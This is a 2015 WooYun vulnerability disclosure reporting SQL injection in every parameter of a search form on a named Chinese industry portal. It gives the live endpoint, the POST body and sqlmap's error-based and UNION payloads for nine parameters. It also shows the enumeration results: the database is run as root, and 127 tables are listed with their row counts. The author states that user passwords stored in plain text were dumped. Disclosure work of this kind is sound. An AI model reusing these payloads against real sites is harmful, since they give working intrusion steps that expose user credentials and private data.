当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104903

漏洞标题:中国工业网某处搜索存在多个参数SQL注入二

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-04-01 15:29

修复时间:2015-05-18 18:20

公开时间:2015-05-18 18:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-01: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-13: 细节向核心白帽子及相关领域专家公开
2015-04-23: 细节向普通白帽子公开
2015-05-03: 细节向实习白帽子公开
2015-05-18: 细节向公众公开

简要描述:

中国工业网(www.indunet.net.cn)作为工业网络传媒的开创者、领导者,是在有关政府部门和行业协会的大力支持下发展起来的国内最具影响力的工业门户网站,是中工集团旗下的核心信息服务型高新技术企业。
   中国工业网开发并运营了国家履行《禁止化学武器公约》工作办公室官方网站和履约信息管理系统,同时与亚洲制造业协会、品牌中国等100多家行业机构开展了全面战略合作。截止到2012年底,中国工业网拥有企业会员20万余家,个人会员80万人,合作协会100多家,合作媒体近千家。
   中国工业网秉承“梦想、责任、价值”的理念,创造了独特的工业信息平台及服务模式,是业内公认的权威资讯传媒。目前已被各大知名搜索工具排到本行业网站首位,成为工业界老板和商务、市场、技术、设计人员每日必上的网站和首选商业工具。

详细说明:

1、继续寻找,又找到一个搜索有注入的地方,而且这个搜索处所有的参数都存在SQL注入

http://www.indunet.net.cn/meet/


2、POST数据

http://www.indunet.net.cn/meet/data!searchmeet.action?gotourl=/meet/searchlist.jsp (POST)
year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234


3、sqlmap测试

Place: POST
Parameter: province
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01&province=17 AND (SELECT 2918 FROM(SELECT COUNT(*),CONCAT(0x716a687771,(SELECT (CASE WHEN (2918=2918) THEN 1 ELSE 0 END)),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01&province=17 UNION ALL SELECT CONCAT(0x716a687771,0x5565696a5648746c4b65,0x71787a7871)#&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
Place: POST
Parameter: month_from
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year_from=2007&month_from=01' AND (SELECT 1015 FROM(SELECT COUNT(*),CONCAT(0x716a687771,(SELECT (CASE WHEN (1015=1015) THEN 1 ELSE 0 END)),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'egAf'='egAf&day_from=01&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: year_from=2007&month_from=01' UNION ALL SELECT CONCAT(0x716a687771,0x62696843647855544f6e,0x71787a7871)#&day_from=01&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
Place: POST
Parameter: day_to
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01' AND (SELECT 9642 FROM(SELECT COUNT(*),CONCAT(0x716a687771,(SELECT (CASE WHEN (9642=9642) THEN 1 ELSE 0 END)),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Fuke'='Fuke&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01' UNION ALL SELECT CONCAT(0x716a687771,0x4f61797950646f6a706a,0x71787a7871)#&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
Place: POST
Parameter: month_to
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01' AND (SELECT 5395 FROM(SELECT COUNT(*),CONCAT(0x716a687771,(SELECT (CASE WHEN (5395=5395) THEN 1 ELSE 0 END)),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MAdP'='MAdP&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01' UNION ALL SELECT CONCAT(0x716a687771,0x61484f554c754f436b62,0x71787a7871)#&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
Place: POST
Parameter: year_from
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year_from=2007' AND (SELECT 2268 FROM(SELECT COUNT(*),CONCAT(0x716a687771,(SELECT (CASE WHEN (2268=2268) THEN 1 ELSE 0 END)),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'slDv'='slDv&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: year_from=2007' UNION ALL SELECT CONCAT(0x716a687771,0x7a47414261554645624d,0x71787a7871)#&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
Place: POST
Parameter: day_from
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year_from=2007&month_from=01&day_from=01' AND (SELECT 5971 FROM(SELECT COUNT(*),CONCAT(0x716a687771,(SELECT (CASE WHEN (5971=5971) THEN 1 ELSE 0 END)),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'euHK'='euHK&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: year_from=2007&month_from=01&day_from=01' UNION ALL SELECT CONCAT(0x716a687771,0x4f4b5267594a6a4c786d,0x71787a7871)#&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
Place: POST
Parameter: year_to
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008' AND (SELECT 1961 FROM(SELECT COUNT(*),CONCAT(0x716a687771,(SELECT (CASE WHEN (1961=1961) THEN 1 ELSE 0 END)),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Dnmp'='Dnmp&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: year_from=2007&month_from=01&day_from=01&year_to=-9458' UNION ALL SELECT CONCAT(0x716a687771,0x707a4552566d704c4777,0x71787a7871)#&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234
Place: POST
Parameter: keyword
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234' AND (SELECT 9102 FROM(SELECT COUNT(*),CONCAT(0x716a687771,(SELECT (CASE WHEN (9102=9102) THEN 1 ELSE 0 END)),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'TOGs'='TOGs
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4&keyword=1234' UNION ALL SELECT CONCAT(0x716a687771,0x7a626f71544752567348,0x71787a7871)#
Place: POST
Parameter: ind
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4' AND (SELECT 6803 FROM(SELECT COUNT(*),CONCAT(0x716a687771,(SELECT (CASE WHEN (6803=6803) THEN 1 ELSE 0 END)),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'oVcz'='oVcz&keyword=1234
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: year_from=2007&month_from=01&day_from=01&year_to=2008&month_to=01&day_to=01&province=17&ind=%C4%DC%D4%B4%BB%AF%B9%A4' UNION ALL SELECT CONCAT(0x716a687771,0x64684e574a7158707850,0x71787a7871)#&keyword=1234
---
web application technology: Servlet 2.4, Tomcat 4.2.3.
back-end DBMS: MySQL >= 5.0.0
current user:    'root@localhost'
current database:    'gyw'
-----------------
available databases [5]:
[*] gyw
[*] information_schema
[*] mysql
[*] test
[*] yygtest
-----------------------
Database: gyw
[127 tables]
+------------------------------+
| T_ANCS_SYSTEM_Entity         |
| T_ANCS_SYSTEM_FUNCTIONTREE   |
| T_ANCS_SYSTEM_GROUPINFO      |
| T_ANCS_SYSTEM_INFO           |
| T_ANCS_SYSTEM_InfoChild      |
| T_ANCS_SYSTEM_PERMISSION     |
| T_ANCS_SYSTEM_ROLEINFO       |
| T_ANCS_SYSTEM_RoleData       |
| T_ANCS_SYSTEM_RolePermission |
| T_ANCS_SYSTEM_RoleRules      |
| T_ANCS_SYSTEM_Rules          |
| T_ANCS_SYSTEM_USERGROUP      |
| T_ANCS_SYSTEM_USERINFO       |
| T_ANCS_SYSTEM_UserRelations  |
| T_ANCS_SYSTEM_UserRole       |
| T_Blog_Album                 |
| T_Blog_Article               |
| T_Blog_Class                 |
| T_Blog_Friend                |
| T_Blog_Info                  |
| T_Blog_Liuyan                |
| T_Blog_Message               |
| T_Blog_Photos                |
| T_Blog_Review                |
| T_Blog_SystemSet             |
| T_EditArticle                |
| T_Edituser                   |
| T_EdituserLanmu              |
| T_FANKUIBEAN                 |
| T_ORDERBEAN                  |
| T_SHOPBEAN                   |
| T_SHOPBEAND                  |
| T_app_UserOnline             |
| T_app_jifen                  |
| T_app_jifenmx                |
| T_app_touxian                |
| T_bbs_bbsarticle             |
| T_bbs_bbsfriend              |
| T_bbs_bbsmessage             |
| T_bbs_bbsuserinfo            |
| T_bbs_diaocha                |
| T_bbs_forum                  |
| T_bbs_forumgroup             |
| T_bbs_forumowner             |
| T_bbs_guanggao               |
| T_bbs_link                   |
| T_bbs_lockip                 |
| T_bbs_lockwords              |
| T_bbs_message                |
| T_bbs_touxian                |
| T_ci_Business                |
| T_ci_EnBusiness              |
| T_ci_Leavemessage            |
| T_ci_Menu                    |
| T_ci_MenuUser                |
| T_ci_Message                 |
| T_ci_Question                |
| T_ci_Shoucang                |
| T_ci_TenderLeavemessage      |
| T_ci_TenderSearchObject      |
| T_ci_TenderUser              |
| T_ci_Tongxun                 |
| T_ci_Tougao                  |
| T_ci_Wenjuan                 |
| T_ci_Zhanhui                 |
| T_ci_Zixun                   |
| T_ci_app_Article             |
| T_ci_app_EditArticle         |
| T_ci_app_InduDown            |
| T_ci_app_Keyword             |
| T_ci_app_Magazine            |
| T_ci_app_Media               |
| T_ci_app_Medium              |
| T_ci_app_Message             |
| T_ci_app_Mulu                |
| T_ci_app_Pinglun             |
| T_ci_app_Qishu               |
| T_ci_app_RoleInfoChild       |
| T_ci_app_ShiPing             |
| T_ci_app_Tc                  |
| T_ci_app_Tcitem              |
| T_ci_app_ad                  |
| T_ci_app_adsub               |
| T_ci_app_anxe                |
| T_ci_app_articletype         |
| T_ci_app_enArticle           |
| T_ci_app_enlamu              |
| T_ci_app_enproduct           |
| T_ci_app_entype              |
| T_ci_app_jobFound            |
| T_ci_app_lunwen              |
| T_ci_app_popele              |
| T_ci_app_product             |
| T_ci_app_resume              |
| T_ci_app_sou                 |
| T_ci_app_tecFound            |
| T_ci_yuanquuser              |
| T_cms_Agent                  |
| T_cms_Buy                    |
| T_cms_Cooperation            |
| T_cms_Investment             |
| T_cms_Leave                  |
| T_cms_Supply                 |
| T_cms_Tender                 |
| T_companyArticle             |
| T_dydq_app_anxe              |
| T_information                |
| T_jizhe                      |
| T_job                        |
| T_jobArticle                 |
| T_project                    |
| T_quanzi_mulu                |
| T_quanzi_zu                  |
| T_quanzi_zuarticle           |
| T_quanzi_zuarticlePinglun    |
| T_quanzi_zusoucang           |
| T_quanzi_zutongzhi           |
| T_quanzi_zuuser              |
| T_tech                       |
| T_yuanqu                     |
| T_zazhi                      |
| T_zhuanjia                   |
| foofoofoo                    |
| grand                        |
| kttype                       |
| news                         |
| rttype                       |
+------------------------------+
Database: gyw
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| T_cms_Investment             | 689523  |
| T_cms_Agent                  | 575161  |
| T_bbs_bbsuserinfo            | 350588  |
| T_ci_app_anxe                | 200891  |
| T_bbs_bbsarticle             | 144958  |
| T_cms_Supply                 | 122536  |
| T_ci_app_adsub               | 119526  |
| T_ci_app_Article             | 108055  |
| T_ci_Zhanhui                 | 70583   |
| T_ANCS_SYSTEM_USERINFO       | 57389   |
| T_app_jifenmx                | 57091   |
| T_ci_Business                | 29795   |
| T_companyArticle             | 5027    |
| grand                        | 4988    |
| kttype                       | 4823    |
| T_EditArticle                | 4188    |
| T_ci_app_enArticle           | 3944    |
| T_ci_app_popele              | 2498    |
| T_job                        | 2301    |
| T_cms_Buy                    | 1923    |
| T_ci_app_Pinglun             | 1495    |
| T_tech                       | 1191    |
| T_ci_app_ad                  | 1161    |
| T_cms_Cooperation            | 1087    |
| T_bbs_diaocha                | 660     |
| T_ci_MenuUser                | 597     |
| T_ci_app_Media               | 583     |
| T_ci_Leavemessage            | 504     |
| T_ANCS_SYSTEM_UserRole       | 484     |
| T_ci_Message                 | 429     |
| T_bbs_link                   | 416     |
| T_ci_app_resume              | 416     |
| T_ANCS_SYSTEM_InfoChild      | 358     |
| T_ci_app_enproduct           | 313     |
| rttype                       | 236     |
| T_yuanqu                     | 220     |
| T_ci_Tougao                  | 168     |
| T_ci_EnBusiness              | 164     |
| T_ci_app_Keyword             | 158     |
| T_ci_app_RoleInfoChild       | 142     |
| T_ci_Zixun                   | 137     |
| T_ci_app_entype              | 126     |
| T_zhuanjia                   | 105     |
| T_bbs_forumowner             | 87      |
| T_ci_app_InduDown            | 78      |
| T_ci_Tongxun                 | 60      |
| T_EdituserLanmu              | 60      |
| T_ci_Wenjuan                 | 57      |
| T_ci_yuanquuser              | 55      |
| T_ci_app_jobFound            | 44      |
| T_ANCS_SYSTEM_RolePermission | 42      |
| T_ANCS_SYSTEM_FUNCTIONTREE   | 41      |
| T_bbs_forum                  | 41      |
| T_zazhi                      | 39      |
| T_ANCS_SYSTEM_INFO           | 36      |
| T_ci_Menu                    | 36      |
| T_ANCS_SYSTEM_USERGROUP      | 35      |
| T_bbs_lockwords              | 34      |
| T_bbs_bbsfriend              | 33      |
| T_ANCS_SYSTEM_ROLEINFO       | 32      |
| T_ci_app_tecFound            | 21      |
| T_ci_Question                | 17      |
| T_ci_Shoucang                | 15      |
| T_bbs_message                | 12      |
| T_ANCS_SYSTEM_PERMISSION     | 11      |
| T_app_jifen                  | 10      |
| T_app_touxian                | 6       |
| T_ci_app_enlamu              | 6       |
| T_ci_app_sou                 | 6       |
| T_Edituser                   | 5       |
| T_ORDERBEAN                  | 5       |
| T_ANCS_SYSTEM_GROUPINFO      | 4       |
| T_bbs_forumgroup             | 4       |
| T_ci_app_Tcitem              | 4       |
| T_bbs_bbsmessage             | 3       |
| T_ci_TenderUser              | 3       |
| T_Blog_Album                 | 1       |
| T_ci_app_Tc                  | 1       |
| T_ci_TenderLeavemessage      | 1       |
| T_FANKUIBEAN                 | 1       |
+------------------------------+---------+


4、随便dump了20个测试,明码显示密码有木有

dump.jpg

漏洞证明:

dump.jpg

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-03 18:19

厂商回复:

按照CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无